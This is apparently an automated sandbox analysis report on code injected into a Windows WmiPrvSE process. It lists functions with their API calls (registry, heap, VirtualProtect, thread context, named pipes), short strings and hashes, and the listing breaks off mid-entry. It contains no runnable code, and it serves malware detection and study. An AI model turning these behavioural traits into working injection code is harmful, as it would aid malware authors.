                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 7E419332311BA092EF26CF26B91C7EE3395BB65BA0F05512D9D09977C9EF38C4498354
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 739 216d26f104c-216d26f10b9 RegQueryInfoKeyW 740 216d26f11b5-216d26f11d0 739->740 741 216d26f10bf-216d26f10c9 739->741 741->740 742 216d26f10cf-216d26f111f RegEnumValueW 741->742 743 216d26f11a5-216d26f11af 742->743 744 216d26f1125-216d26f112a 742->744 743->740 743->742 744->743 745 216d26f112c-216d26f1135 744->745 746 216d26f1147-216d26f114c 745->746 747 216d26f1137 745->747 749 216d26f114e-216d26f1193 GetProcessHeap call 216d2706168 GetProcessHeap HeapFree 746->749 750 216d26f1199-216d26f11a3 746->750 748 216d26f113b-216d26f113f 747->748 748->743 751 216d26f1141-216d26f1145 748->751 749->750 750->743 751->746 751->748
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 36a5de4b35330dd6bf783404e2c0f3cce9a4c255769af094cc3b1710d72c7746
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: CE416D73614B84C6EB60CF22E45879E77B1F399B98F448129DA8907B58DF39C489CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000216D26FC7DE,?,?,?,?,?,?,?,?,00000216D26FCF9D,?,?,00000001), ref: 00000216D26FD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: bbdc88ed379a5248da2f3bc616235ad33d39205bdc7da67ecc880a6fe3d3c7e5
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 5E1151307043E443FE69A735B55D3FF61515BB47F0F24532C98390A6DADE69E4428200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: d91f1ddd1e23f78949fbc93a21aec31379e2e5c1a4099b5947a4f9999bde744f
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 0C31A53131B7A0D2EE25DB42B90C7EE22A4BB68BA4F59052D9D1D0B798EF39C4498350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D2703DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 7ab6818446840e18fec15ba70f91da5db94e77b29423fbb15da8559ae62a4ca0
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: F711BF31310B8086E7708B13F96C7AD72B0F7A8FE4F050229EA6A87794CF39C8488740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: d4fca3ae67716ce6b46a4d8b2ad9e809881d3a676f3b5f353888f58d38bd36b4
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: E3115736700B9083EF249B22F51D6AE62B4FB98B84F050028DE9903794EF2EC509C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: daa48e532976326172583e3a4c571c47417c5d4eaf44e271789a03aca871daf1
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: CCD19A76309B9882DA719B06F49839E7BA0F7D8B84F11011AEACD47BA5DF3CC541CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: f5f8e4336207762ff06b85c0c5e7c1aa6cd79ed60dfa5d07f0cf3e87d149ceda
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 9131B032712BA183EA24DF17F54C7AE67A0FB64B84F094029AE4847B55EF39C4A58700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: dce4a53cde0980e9e7bfa8e5c238c057e3e134f4f123bc0cd4f8d66485bd53a0
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: DE117C307013E083FE65A732B65D7FE62526FB57F4F25172CA8364BBEADE6994418200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: aaa05becb4c794b8857766a330a48a9d678b44623b64567a254f1759be6cd1d3
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 9E015731700B8082EA24DB53B96C7AEA3B1F798BC4F894039DE5943758DF39C989C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 16afa84e82cc86c646f2e738083c556f07bcf6cc28e13af764bfc987c5c61cb4
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 4F011775711B9082FF349B22F92DBAE62B0BB69B86F05442DCA4907764EF3EC5588704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: fbb99a4ca73ed02ef3618f4b3511766aee6ed6129d4346f9d11c6a549c236738
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: EF518A3271A7A08BEF18DF15F44CB9E27A6F364B98F118128DA064378CEB75C841CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 1e00c5c04a80ba1c2bca88dccdd20ab6fe7f7f0abb252079c830c24d101d64d9
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: E7318A3230A7A087EB24DF12F84CB9E7BA5F360B88F058028AE5643789DB39C944C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 54468008fb76d3ceb074340360c7efe810375cd3f49c34f7dcfcdf5d716536ec
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 2AF0443270478192EB709B21F9AC7AE6771F7A8BC8F844028DA4946554DF3DC64DCB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 1f8ee4dff4bd355b026cc7db21423f4b422cb372abe15318a0c4be239f57fa13
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: CDF08270704BD082EA248F13BA2C1AEA271BB58FD0F054039EE5647B18DF3DC4598740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 61dffab3c17364cab24f57077d3ec7b86dbba340f16fca5bb8c7f50fe85359fa
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 3AF06771311B4482EF208B2AF85D7AE6330FBA8BA1F55021DCA6A462E4DF2EC4498350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 948c8bec6fbc4b08e2981e4d1d6d3b02dc10d3ff283c73938789242dd6c4b88b
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 2A02A73261DBD486EB60CB55F49839FB7A1F3D5794F105119EA8E87BA8DB78C884CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 90313672a6e2754a66723f333f78db76843b27ab28469919e333a7b4c8eb3b37
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: 5C619736619B94C7EB608B15F45C36FB7A1F398794F10111AEA8E47BA8EB7CC940CB04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 070c2ad1e28439dfe6348e1f8a119f9c906d6458a8f3c0467de36e95644402c2
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: EE616732705B948AEB20DF65E4883DE77A1F3A8B88F144219EF4917B98DB38C995C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26FAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: e3cc943b61c5eede2163ff4031a19a7949b406678ad233934a46768c194c72e9
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 5B516E773043E08BEF648B16A58C39E77A0F3A4B85F14815EEA994BBD5CB38D850C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D2702058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: bc674476e9f7a6a1d0bf5a9b290e8843e086fa641938ceb4ebd2d10bd0af943e
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 1BD1E333B14A808AE721CFBAE5483EC3BB1F364799F15421ADE5997B99DB35C40AC340
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 5032111f951d62ea2bb3c5acc9668f4dfe8daefab9db1ee2bbc544a827910f45
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: EF117C36A00B90CAE724DF63BA1D2AE77B0F7ACF81F054029EA4903716DF35C8588740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D2702980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 36a833b3bf5a97540ca24a82c186a25b77ac2cdb82885c3ca0b348520cb859d7
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: FD91CE7371065085FB719F76AA9C3FD2BB0B764B89F16410DDE0A67A94DB36C88AC700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 091921a5353eaee6d8d05110a31c67a1cc70bb8c7c926eef7601143a08dd229d
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: BD112E36B10F018AEB10CF61F8693EC33B4F769758F451E25DA6D467A4EB78C5988380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D26F2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 95040b388840690fbbe067b36436dc91eace62590150f5e531ba2dbf86a9aef3
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: D551B0327047E183EE749F2AF5AC3EFAA51F3A5B80F45012DDE5903B99DA79C5448B40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000216D27026F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2367241608.00000216D26F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216D26F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_216d26f0000_WmiPrvSE.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 4e90db8bea5616d396187460a7c04a3a7846526dde713a22801b68fa29f860a9
